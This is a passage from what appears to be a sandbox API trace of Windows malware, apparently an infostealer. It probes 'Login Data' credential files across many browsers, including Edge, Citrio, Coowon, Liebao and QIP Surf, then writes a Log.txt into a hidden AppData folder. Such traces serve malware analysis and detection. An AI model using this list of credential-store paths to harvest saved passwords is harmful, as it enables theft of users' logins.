ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.520] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data", lpFilePart=0x0) returned 0x60 [0237.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.520] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\fenrir inc\\sleipnir5\\setting\\modules\\chromiumviewer\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.521] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpFilePart=0x0) returned 0x3e [0237.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.521] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\catalinagroup\\citrio\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.521] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x51 [0237.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.521] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\catalinagroup\\citrio\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.521] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Login Data", lpFilePart=0x0) returned 0x49 [0237.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.521] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\catalinagroup\\citrio\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.521] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Coowon\\Coowon\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Coowon\\Coowon\\User Data", lpFilePart=0x0) returned 0x37 [0237.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.521] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Coowon\\Coowon\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\coowon\\coowon\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.522] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x4a [0237.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.522] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\coowon\\coowon\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.522] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Coowon\\Coowon\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Coowon\\Coowon\\User Data\\Login Data", lpFilePart=0x0) returned 0x42 [0237.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.522] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Coowon\\Coowon\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\coowon\\coowon\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.522] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\liebao\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\liebao\\User Data", lpFilePart=0x0) returned 0x30 [0237.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.522] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\liebao\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\liebao\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.523] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\liebao\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\liebao\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x43 [0237.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.523] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\liebao\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\liebao\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.523] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\liebao\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\liebao\\User Data\\Login Data", lpFilePart=0x0) returned 0x3b [0237.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.523] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\liebao\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\liebao\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.523] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\QIP Surf\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\QIP Surf\\User Data", lpFilePart=0x0) returned 0x32 [0237.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.523] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\QIP Surf\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\qip surf\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.523] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\QIP Surf\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\QIP Surf\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x45 [0237.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.523] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\QIP Surf\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\qip surf\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.524] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\QIP Surf\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\QIP Surf\\User Data\\Login Data", lpFilePart=0x0) returned 0x3d [0237.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.524] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\QIP Surf\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\qip surf\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.524] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Edge\\User Data", nBufferLength=0x105, lpBuffer=0x615bb84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Edge\\User Data", lpFilePart=0x0) returned 0x38 [0237.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615bfe0) returned 1 [0237.524] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Edge\\User Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\edge\\user data"), fInfoLevelId=0x0, lpFileInformation=0x615c05c | out: lpFileInformation=0x615c05c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bfdc) returned 1 [0237.525] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x4b [0237.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.525] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\edge\\user data\\default\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.525] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Edge\\User Data\\Login Data", nBufferLength=0x105, lpBuffer=0x615bba8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Edge\\User Data\\Login Data", lpFilePart=0x0) returned 0x43 [0237.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c008) returned 1 [0237.525] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Edge\\User Data\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\edge\\user data\\login data"), fInfoLevelId=0x0, lpFileInformation=0x615c084 | out: lpFileInformation=0x615c084*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c004) returned 1 [0237.526] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\.", nBufferLength=0x105, lpBuffer=0x615bcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", lpFilePart=0x0) returned 0x2a [0237.527] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", nBufferLength=0x105, lpBuffer=0x615bc40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", lpFilePart=0x0) returned 0x32 [0237.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c134) returned 1 [0237.527] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\log.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x490 [0237.527] GetFileType (hFile=0x490) returned 0x1 [0237.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c130) returned 1 [0237.527] GetFileType (hFile=0x490) returned 0x1 [0237.623] WriteFile (in: hFile=0x490, lpBuffer=0x2791d44*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x615c1b0, lpOverlapped=0x0 | out: lpBuffer=0x2791d44*, lpNumberOfBytesWritten=0x615c1b0*=0x549, lpOverlapped=0x0) returned 1 [0237.624] CloseHandle (hObject=0x490) returned 1 [0237.629] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\.", nBufferLength=0x105, lpBuffer=0x615bd20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", lpFilePart=0x0) returned 0x2a [0237.670] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\.", nBufferLength=0x105, lpBuffer=0x615bd20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", lpFilePart=0x0) returned 0x2a [0237.689] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", nBufferLength=0x105, lpBuffer=0x615bca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", lpFilePart=0x0) returned 0x2a [0237.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c13c) returned 1 [0237.689] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933"), fInfoLevelId=0x0, lpFileInformation=0x615c1b8 | out: lpFileInformation=0x615c1b8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe59c7af0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec7931b0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0237.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c138) returned 1 [0237.690] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x615be84 | out: pTimeZoneInformation=0x615be84) returned 0x0 [0237.691] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Greenwich Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x615bf68 | out: phkResult=0x615bf68*=0x478) returned 0x0 [0237.691] RegQueryValueExW (in: hKey=0x478, lpValueName="TZI", lpReserved=0x0, lpType=0x615bf84, lpData=0x0, lpcbData=0x615bf80*=0x0 | out: lpType=0x615bf84*=0x3, lpData=0x0, lpcbData=0x615bf80*=0x2c) returned 0x0 [0237.691] RegQueryValueExW (in: hKey=0x478, lpValueName="TZI", lpReserved=0x0, lpType=0x615bf84, lpData=0x2798bc0, lpcbData=0x615bf80*=0x2c | out: lpType=0x615bf84*=0x3, lpData=0x2798bc0*, lpcbData=0x615bf80*=0x2c) returned 0x0 [0237.692] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Greenwich Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x615bdbc | out: phkResult=0x615bdbc*=0x0) returned 0x2 [0237.693] RegQueryValueExW (in: hKey=0x478, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x615bf5c, lpData=0x0, lpcbData=0x615bf58*=0x0 | out: lpType=0x615bf5c*=0x1, lpData=0x0, lpcbData=0x615bf58*=0x20) returned 0x0 [0237.693] RegQueryValueExW (in: hKey=0x478, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x615bf5c, lpData=0x2798f8c, lpcbData=0x615bf58*=0x20 | out: lpType=0x615bf5c*=0x1, lpData="@tzres.dll,-880", lpcbData=0x615bf58*=0x20) returned 0x0 [0237.693] RegQueryValueExW (in: hKey=0x478, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x615bf5c, lpData=0x0, lpcbData=0x615bf58*=0x0 | out: lpType=0x615bf5c*=0x1, lpData=0x0, lpcbData=0x615bf58*=0x20) returned 0x0 [0237.693] RegQueryValueExW (in: hKey=0x478, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x615bf5c, lpData=0x2798fe4, lpcbData=0x615bf58*=0x20 | out: lpType=0x615bf5c*=0x1, lpData="@tzres.dll,-272", lpcbData=0x615bf58*=0x20) returned 0x0 [0237.693] RegQueryValueExW (in: hKey=0x478, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x615bf5c, lpData=0x0, lpcbData=0x615bf58*=0x0 | out: lpType=0x615bf5c*=0x1, lpData=0x0, lpcbData=0x615bf58*=0x20) returned 0x0 [0237.693] RegQueryValueExW (in: hKey=0x478, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x615bf5c, lpData=0x279903c, lpcbData=0x615bf58*=0x20 | out: lpType=0x615bf5c*=0x1, lpData="@tzres.dll,-271", lpcbData=0x615bf58*=0x20) returned 0x0 [0237.694] CoTaskMemAlloc (cb=0x20c) returned 0x7fa3b0 [0237.694] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7fa3b0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0237.695] CoTaskMemFree (pv=0x7fa3b0) [0237.695] CoTaskMemAlloc (cb=0x20c) returned 0x7fa3b0 [0237.695] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x615bf78, pwszFileMUIPath=0x7fa3b0, pcchFileMUIPath=0x615bf7c, pululEnumerator=0x615bf70 | out: pwszLanguage=0x0, pcchLanguage=0x615bf78, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x615bf7c, pululEnumerator=0x615bf70) returned 1 [0237.698] CoTaskMemFree (pv=0x0) [0237.698] CoTaskMemFree (pv=0x7fa3b0) [0237.698] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x5c80001 [0237.702] CoTaskMemAlloc (cb=0x3ec) returned 0x4b76348 [0237.702] LoadStringW (in: hInstance=0x5c80001, uID=0x370, lpBuffer=0x4b76348, cchBufferMax=500 | out: lpBuffer="(UTC) Monrovia, Reykjavik") returned 0x19 [0237.702] CoTaskMemFree (pv=0x4b76348) [0237.702] FreeLibrary (hLibModule=0x5c80001) returned 1 [0237.703] CoTaskMemAlloc (cb=0x20c) returned 0x7fa3b0 [0237.703] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7fa3b0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0237.703] CoTaskMemFree (pv=0x7fa3b0) [0237.703] CoTaskMemAlloc (cb=0x20c) returned 0x7fa3b0 [0237.703] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x615bf78, pwszFileMUIPath=0x7fa3b0, pcchFileMUIPath=0x615bf7c, pululEnumerator=0x615bf70 | out: pwszLanguage=0x0, pcchLanguage=0x615bf78, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x615bf7c, pululEnumerator=0x615bf70) returned 1 [0237.704] CoTaskMemFree (pv=0x0) [0237.704] CoTaskMemFree (pv=0x7fa3b0) [0237.704] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x5c80001 [0237.704] CoTaskMemAlloc (cb=0x3ec) returned 0x4b76348 [0237.704] LoadStringW (in: hInstance=0x5c80001, uID=0x110, lpBuffer=0x4b76348, cchBufferMax=500 | out: lpBuffer="Greenwich Standard Time") returned 0x17 [0237.704] CoTaskMemFree (pv=0x4b76348) [0237.705] FreeLibrary (hLibModule=0x5c80001) returned 1 [0237.705] CoTaskMemAlloc (cb=0x20c) returned 0x7fa3b0 [0237.705] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7fa3b0 | out: pszPath="C:\\Windows\\system32") returned 